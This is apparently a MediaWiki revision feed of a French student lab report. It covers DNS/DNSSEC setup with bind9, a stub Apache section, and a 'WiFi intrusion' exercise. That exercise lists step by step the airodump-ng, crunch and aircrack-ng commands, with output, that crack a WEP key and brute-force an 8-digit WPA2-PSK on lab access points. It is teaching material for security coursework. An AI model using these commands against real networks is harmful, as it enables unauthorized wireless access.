*https://dnsviz.net/&lt;br /&gt;
&lt;br /&gt;
&amp;lt;small&amp;gt;Remarque : Nous avons également utilisé &amp;lt;code&amp;gt;dig&amp;lt;/code&amp;gt; pour nos tests intermédiaires.&amp;lt;/small&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le premier site, DNSChecker, nous informe si la propagation de notre DNS a eu lieu.&lt;br /&gt;
&lt;br /&gt;
Dans le cas de '''tompere2.xyz''', on voit que c'est bon, aussi bien en IPv4 qu'en IPv6.&lt;br /&gt;
[[Fichier:Déploiement IPv4.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
[[Fichier:Déploiement DNS IPv6.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
Le DNS marche bien ! Super !&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant s'assurer que la partie sécurisée, fonctionne également.&lt;br /&gt;
&lt;br /&gt;
Rendons nous sur '''DNSViz''', un outil qui nous donnera plus d'informations à ce sujet.&lt;br /&gt;
[[Fichier:DNS Viz.png|néant|vignette|Le DNSSEC fonctionne !]]&lt;br /&gt;
Comme on le vois, le DNSSEC fonctionne ! Cela dit, une clé est inutilisée, comme indiqué sur le schéma en gris clair. Nous pouvons la supprimer de '''Gandi,''' pour rendre l'architecture plus cohérente.&lt;br /&gt;
&lt;br /&gt;
== Serveur Apache ==&lt;br /&gt;
Notre DNSSEC est désormais fonctionnel, on peut alors passer à la configuration d'une page web via &amp;lt;code&amp;gt;apache2&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
=== Objectif ===&lt;br /&gt;
L'objectif du serveur Apache sera de pouvoir servir les pages webs de nos machines de services.&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation du paquet ====&lt;br /&gt;
&amp;lt;code&amp;gt;apt update&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;apt install apache2&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Paramètrage sur machine mandataire ====&lt;br /&gt;
&lt;br /&gt;
==== Paramètrage sur la machine de service Tompere2 ====&lt;br /&gt;
&lt;br /&gt;
=== Résultat ===&lt;br /&gt;
[[Fichier:Mon site web.png|néant|vignette|Photo de mon site tompere2.xyz]]&lt;br /&gt;
&lt;br /&gt;
== Fail2Ban ==&lt;br /&gt;
&lt;br /&gt;
== Effraction WiFi ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de cracotte10 ====&lt;br /&gt;
Pour trouver l'adresse MAC de cracotte10, nous pouvons utiliser &amp;lt;code&amp;gt;airodump-ng&amp;lt;/code&amp;gt;. Pour ce faire, nous devons tout d'abord trouver le '''nom de la carte réseau'''. On peut trouver cela via &amp;lt;code&amp;gt;ip link&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
J'obtiens alors &amp;lt;code&amp;gt;wlan0&amp;lt;/code&amp;gt;, mais pour augmenter la vitesse de cassage, nous utiliserons une clé USB Wi-Pi qui nous attribuera le &amp;lt;code&amp;gt;wlx40a5efd2140c&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on scanne grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid cracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:59  -69        2        1    0   4   54e. WEP  WEP         cracotte10              &lt;br /&gt;
&lt;br /&gt;
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de cracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;04:DA:D2:9C:50:59&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Récupération de données ====&lt;br /&gt;
Une fois '''l'adresse mac et le canal récupérés''', nous pouvons récupérer un flux de données qui sera stocké dans un fichier &amp;lt;code&amp;gt;.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:59 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WEP ====&lt;br /&gt;
Pendant que le fichier se remplit, on peut vérifier régulièrement si la clef a été trouvée.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si le programme réussit, nous '''obtenons la clef !'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;KEY FOUND!   [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Désormais, nous voulons la clef WPA-PSK. Nous savons que cette clef est composée de 8 chiffres. Ainsi, la méthode sera de tester toutes les combinaisons possibles.&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de kracotte10 ====&lt;br /&gt;
Nous obtenons l'adresse MAC grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid kracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09  -67        4        0    0  13   54e. WPA2 CCMP   PSK  kracotte10              &lt;br /&gt;
&lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de kracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;44:AD:D9:5F:87:09&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Dictionnaire ====&lt;br /&gt;
Pour casser le mot de passe par force brute, il nous faut toutes les combinaisons possibles. Le paquetage &amp;lt;code&amp;gt;crunch&amp;lt;/code&amp;gt; est l'outil parfait dans notre cas.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons générer toutes ces combinaisons dans un fichier texte en faisant :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;crunch 8 8 0123456789 -o 8numbers_dico.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Handshake ====&lt;br /&gt;
Maintenant que nous avons l'adresse MAC et le dictionnaire, il nous faut un handshake, nous pouvons faire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:09 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WPA-PSK ====&lt;br /&gt;
Une fois avoir attendu quelques minutes, il suffit de lancer la commande suivante:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -w 8numbers_dico.txt -b 44:AD:D9:5F:87:09 dump-01.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette commande va tester toutes les lignes du fichier texte. Dans notre cas, comme il y a 10 000 000 de possiblités, il faudra attendre une trentaine de minutes avant de trouver la clef.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
	                               Aircrack-ng 1.7&lt;br /&gt;
&lt;br /&gt;
      [00:31:37] 66625424/100000000 keys tested (34611.27 k/s)&lt;br /&gt;
&lt;br /&gt;
      Time left: 16 minutes, 4 seconds                          66.63%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66680666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 67 BB 05 71 A9 6D E4 5C 11 65 42 F7 BD 81 F1 7E&lt;br /&gt;
                       CD 69 8F FE F3 CD 2A 64 9D F1 74 7B 4D F0 CA 65&lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 45 9C CA 1B 45 A8 DA C5 1A 82 BF F5 C4 FF AF 01&lt;br /&gt;
                       FE CD F8 A4 21 38 1A 58 BB C5 DE BA 00 5B BF 2A&lt;br /&gt;
                       03 66 AF 4B 36 A8 B8 C4 B4 30 62 BB 30 73 DA 00&lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00&lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 48 08 73 07 B7 6C 9C FA 3A F1 58 DD 49 93 4C 3E&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation et accès WiFi par WPA2-EAP ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12331</id>
		<title>Atelier SysRes SE4 2025/2026 E10</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12331"/>
		<updated>2026-02-22T10:54:39Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Informations utiles ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+&lt;br /&gt;
!Machine&lt;br /&gt;
!Nom&lt;br /&gt;
!Site web&lt;br /&gt;
!IPv4 publique&lt;br /&gt;
|-&lt;br /&gt;
|Ma machine de service&lt;br /&gt;
|TomPere2&lt;br /&gt;
|tompere2.xyz&lt;br /&gt;
|''NA''&lt;br /&gt;
|-&lt;br /&gt;
|Machine de service d'Aurèle&lt;br /&gt;
|TomPere1&lt;br /&gt;
|tompere.online&lt;br /&gt;
|''NA''&lt;br /&gt;
|-&lt;br /&gt;
|Machine mandataire&lt;br /&gt;
|TomPere0&lt;br /&gt;
|''NA''&lt;br /&gt;
|193.48.57.168&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
== Configuration réseau ==&lt;br /&gt;
&lt;br /&gt;
== DNS/DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
=== Prérequis ===&lt;br /&gt;
Nous devons configurer un serveur DNS, qui associe '''tompere.online''' et '''tompere2.xyz''', aux machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons commencé par louer ces noms de domaine. sur Gandi.&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons pu télécharger les clés qui seront utiles plus tard pour configurer le DNSSEC.&lt;br /&gt;
&lt;br /&gt;
* '''.key''' : la clé privée du domaine&lt;br /&gt;
&lt;br /&gt;
* '''.csr''' : la demande de signature du certificat&lt;br /&gt;
&lt;br /&gt;
=== Configuration du paquetage bind9 ===&lt;br /&gt;
Il faut installer le paquetage &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; avec &amp;lt;code&amp;gt;apt&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Ensuite, il faut configurer un fichier de zone : &amp;lt;code&amp;gt;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;lt;/code&amp;gt;.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    $TTL 400&lt;br /&gt;
    ; Zone file for tompere.online&lt;br /&gt;
    @ IN SOA ns.tompere2.xyz. postmaster.tompere2.xyz. (&lt;br /&gt;
        3703        ; Serial&lt;br /&gt;
        21600       ; Refresh (6h)&lt;br /&gt;
        3600        ; Retry (1h)&lt;br /&gt;
        2592000     ; Expire (30 days)&lt;br /&gt;
        86400       ; Negative cache (24h)&lt;br /&gt;
        )&lt;br /&gt;
&lt;br /&gt;
    ; Name servers&lt;br /&gt;
    @ IN NS ns.tompere2.xyz.&lt;br /&gt;
    @ IN NS ns.tompere.online.&lt;br /&gt;
&lt;br /&gt;
    ; AAAA records (IPv6)&lt;br /&gt;
    @   IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
    ns IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
&lt;br /&gt;
    ; A records (IPv4)&lt;br /&gt;
    ns IN A 193.48.57.168&lt;br /&gt;
    @   IN A 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
    ; CNAME records&lt;br /&gt;
    www IN CNAME tompere2.xyz.&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous avons choisi '''ns''' comme préfixe à nos noms de domaine. Il faut veiller à bien rester cohérent en remplissant la section '''External Nameservers''' de Gandi.&lt;br /&gt;
&lt;br /&gt;
Concernant l'adresse '''IPv4''', &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt; est l'adresse publique de la machine mandataire, ce qui est logique car elle doit être accessible depuis l'extérieur.&lt;br /&gt;
&lt;br /&gt;
Par ailleurs, il faut bien penser à ajouter les '''permissions aux dossiers parents''' de ce fichier de zone. Sinon, des logs ''&amp;quot;Permission Denied&amp;quot;'' apparaîtront, et le DNS sera non fonctionnel.&lt;br /&gt;
&lt;br /&gt;
La syntaxe de ce fichier doit être précise, ainsi, il est pratique de vérifier la validité du fichier via l'utilitaire &amp;lt;code&amp;gt;named-checkzone&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Aussi, pour s'assurer que les mises à jour du fichier sont prises en compte, il faut toujours modifier le numéro de série, par exemple en l'incrémentant de 1.&lt;br /&gt;
&lt;br /&gt;
Maintenant, modifions le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    zone &amp;quot;tompere2.xyz&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;quot;;&lt;br /&gt;
        allow-transfer { secondaries; };  // Filtrage des secondaires&lt;br /&gt;
        also-notify { hiddensecondaries; };&lt;br /&gt;
&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    acl &amp;quot;secondaries&amp;quot; {&lt;br /&gt;
        192.168.0.2;   // Serveur secondaire IPv4&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe4b:1909; // Serveur secondaire IPv6&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    masters &amp;quot;hiddensecondaries&amp;quot; {&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    zone &amp;quot;tompere.online&amp;quot;{&lt;br /&gt;
        type secondary;&lt;br /&gt;
        file &amp;quot;/etc/bind/backup/tompere&amp;quot;;&lt;br /&gt;
        primaries{ 2001:660:4401:60a0:216:3eff:fe4b:1909; };&lt;br /&gt;
    };&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier gère qui est maître ou secondaire pour chaque domaine, où est le fichier de zone, et quels serveurs sont autorisés à recevoir ou notifier les mises à jour.&lt;br /&gt;
&lt;br /&gt;
=== Glue Record ===&lt;br /&gt;
Pour que le domaine soit accessible depuis Internet, j’ai ajouté un '''Glue Record''' sur '''Gandi'''. &lt;br /&gt;
&lt;br /&gt;
Cela permet d’associer l’adresse '''IPv4''' de la machine mandataire et l’adresse '''IPv6''' de ma machine de services aux serveurs de noms du domaine.&lt;br /&gt;
&lt;br /&gt;
* ns.tompere2.xyz&lt;br /&gt;
** IPv4 : &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt;&lt;br /&gt;
** IPv6 : &amp;lt;code&amp;gt;2001:660:4401:60a0:216:3eff:fe3f:9410&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
Pour sécuriser le DNS et avoir un site en HTTPS, nous devons apporter quelques modifications au fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
En effet, nous allons rajouter ces lignes dans &amp;lt;code&amp;gt;zone &amp;quot;tompere2.xyz&amp;quot;&amp;lt;/code&amp;gt; &amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
notify yes;  // Notification des secondaires&lt;br /&gt;
key-directory &amp;quot;/etc/bind/keys&amp;quot;; //repertoire des keys&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot;; //utilisation d'une politique DNSSEC&lt;br /&gt;
inline-signing yes; //activation de la signature automatique&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;De plus, il faut ajouter&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {&lt;br /&gt;
    keys {&lt;br /&gt;
        ksk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
        zsk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
    };&lt;br /&gt;
    nsec3param;&lt;br /&gt;
};&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ces lignes servent à définir une '''politique de signature'''. Cela indique quelles clés utiliser (KSK/ZSK), leur durée de vie et l’algorithme de signature.&lt;br /&gt;
&lt;br /&gt;
Les clés vont être créer automatiquement au redémarrage de bind, mais il faut pour cela créer un dossier &amp;lt;code&amp;gt;/bind/keys&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
mkdir /etc/bind/keys&lt;br /&gt;
chown bind:bind /etc/bind/keys&lt;br /&gt;
chmod 750 /etc/bind/keys&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin, nous pouvons redémarrer bind pour vérifier la création des clés.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
systemctl restart named&lt;br /&gt;
systemctl enable named&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Les clés sont biens générées !&lt;br /&gt;
&lt;br /&gt;
Il faut désormais '''copier la clé publique''' (.key) sur '''Gandi'''.&lt;br /&gt;
&lt;br /&gt;
Dans mon cas, j'avais 2 clés publiques .key, donc j'ai copié ces deux clés sur Gandi, mais comme nous allons voir, une seule est utile.&lt;br /&gt;
&lt;br /&gt;
Pour mieux visualiser le déploiement de notre DNS, nous pouvons utiliser deux sites bien utiles :&lt;br /&gt;
*https://dnschecker.org/&lt;br /&gt;
*https://dnsviz.net/&lt;br /&gt;
&lt;br /&gt;
&amp;lt;small&amp;gt;Remarque : Nous avons également utilisé &amp;lt;code&amp;gt;dig&amp;lt;/code&amp;gt; pour nos tests intermédiaires.&amp;lt;/small&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le premier site, DNSChecker, nous informe si la propagation de notre DNS a eu lieu.&lt;br /&gt;
&lt;br /&gt;
Dans le cas de '''tompere2.xyz''', on voit que c'est bon, aussi bien en IPv4 qu'en IPv6.&lt;br /&gt;
[[Fichier:Déploiement IPv4.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
[[Fichier:Déploiement DNS IPv6.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
Le DNS marche bien ! Super !&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant s'assurer que la partie sécurisée, fonctionne également.&lt;br /&gt;
&lt;br /&gt;
Rendons nous sur '''DNSViz''', un outil qui nous donnera plus d'informations à ce sujet.&lt;br /&gt;
[[Fichier:DNS Viz.png|néant|vignette|Le DNSSEC fonctionne !]]&lt;br /&gt;
Comme on le vois, le DNSSEC fonctionne ! Cela dit, une clé est inutilisée, comme indiqué sur le schéma en gris clair. Nous pouvons la supprimer de '''Gandi,''' pour rendre l'architecture plus cohérente.&lt;br /&gt;
&lt;br /&gt;
== Serveur Apache ==&lt;br /&gt;
Notre DNSSEC est désormais fonctionnel, on peut alors passer à la configuration d'une page web via &amp;lt;code&amp;gt;apache2&amp;lt;/code&amp;gt;.&lt;br /&gt;
[[Fichier:Mon site web.png|néant|vignette|Photo de mon site tompere2.xyz]]&lt;br /&gt;
&lt;br /&gt;
== Fail2Ban ==&lt;br /&gt;
&lt;br /&gt;
== Effraction WiFi ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de cracotte10 ====&lt;br /&gt;
Pour trouver l'adresse MAC de cracotte10, nous pouvons utiliser &amp;lt;code&amp;gt;airodump-ng&amp;lt;/code&amp;gt;. Pour ce faire, nous devons tout d'abord trouver le '''nom de la carte réseau'''. On peut trouver cela via &amp;lt;code&amp;gt;ip link&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
J'obtiens alors &amp;lt;code&amp;gt;wlan0&amp;lt;/code&amp;gt;, mais pour augmenter la vitesse de cassage, nous utiliserons une clé USB Wi-Pi qui nous attribuera le &amp;lt;code&amp;gt;wlx40a5efd2140c&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on scanne grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid cracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:59  -69        2        1    0   4   54e. WEP  WEP         cracotte10              &lt;br /&gt;
&lt;br /&gt;
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de cracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;04:DA:D2:9C:50:59&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Récupération de données ====&lt;br /&gt;
Une fois '''l'adresse mac et le canal récupérés''', nous pouvons récupérer un flux de données qui sera stocké dans un fichier &amp;lt;code&amp;gt;.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:59 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WEP ====&lt;br /&gt;
Pendant que le fichier se remplit, on peut vérifier régulièrement si la clef a été trouvée.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si le programme réussit, nous '''obtenons la clef !'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;KEY FOUND!   [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Désormais, nous voulons la clef WPA-PSK. Nous savons que cette clef est composée de 8 chiffres. Ainsi, la méthode sera de tester toutes les combinaisons possibles.&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de kracotte10 ====&lt;br /&gt;
Nous obtenons l'adresse MAC grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid kracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09  -67        4        0    0  13   54e. WPA2 CCMP   PSK  kracotte10              &lt;br /&gt;
&lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de kracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;44:AD:D9:5F:87:09&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Dictionnaire ====&lt;br /&gt;
Pour casser le mot de passe par force brute, il nous faut toutes les combinaisons possibles. Le paquetage &amp;lt;code&amp;gt;crunch&amp;lt;/code&amp;gt; est l'outil parfait dans notre cas.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons générer toutes ces combinaisons dans un fichier texte en faisant :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;crunch 8 8 0123456789 -o 8numbers_dico.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Handshake ====&lt;br /&gt;
Maintenant que nous avons l'adresse MAC et le dictionnaire, il nous faut un handshake, nous pouvons faire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:09 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WPA-PSK ====&lt;br /&gt;
Une fois avoir attendu quelques minutes, il suffit de lancer la commande suivante:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -w 8numbers_dico.txt -b 44:AD:D9:5F:87:09 dump-01.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette commande va tester toutes les lignes du fichier texte. Dans notre cas, comme il y a 10 000 000 de possiblités, il faudra attendre une trentaine de minutes avant de trouver la clef.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
	                               Aircrack-ng 1.7&lt;br /&gt;
&lt;br /&gt;
      [00:31:37] 66625424/100000000 keys tested (34611.27 k/s)&lt;br /&gt;
&lt;br /&gt;
      Time left: 16 minutes, 4 seconds                          66.63%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66680666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 67 BB 05 71 A9 6D E4 5C 11 65 42 F7 BD 81 F1 7E&lt;br /&gt;
                       CD 69 8F FE F3 CD 2A 64 9D F1 74 7B 4D F0 CA 65&lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 45 9C CA 1B 45 A8 DA C5 1A 82 BF F5 C4 FF AF 01&lt;br /&gt;
                       FE CD F8 A4 21 38 1A 58 BB C5 DE BA 00 5B BF 2A&lt;br /&gt;
                       03 66 AF 4B 36 A8 B8 C4 B4 30 62 BB 30 73 DA 00&lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00&lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 48 08 73 07 B7 6C 9C FA 3A F1 58 DD 49 93 4C 3E&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation et accès WiFi par WPA2-EAP ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12248</id>
		<title>Atelier SysRes SE4 2025/2026 E10</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12248"/>
		<updated>2026-02-10T23:41:01Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : /* Machines virtuelles */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
== Configuration réseau ==&lt;br /&gt;
&lt;br /&gt;
== DNS/DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
=== Prérequis ===&lt;br /&gt;
Nous devons configurer un serveur DNS, qui associe '''tompere.online''' et '''tompere2.xyz''', aux machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons commencé par louer ces noms de domaine. sur Gandi.&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons pu télécharger les clés qui seront utiles plus tard pour configurer le DNSSEC.&lt;br /&gt;
&lt;br /&gt;
* '''.key''' : la clé privée du domaine&lt;br /&gt;
&lt;br /&gt;
* '''.csr''' : la demande de signature du certificat&lt;br /&gt;
&lt;br /&gt;
=== Configuration du paquetage bind9 ===&lt;br /&gt;
Il faut installer le paquetage &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; avec &amp;lt;code&amp;gt;apt&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
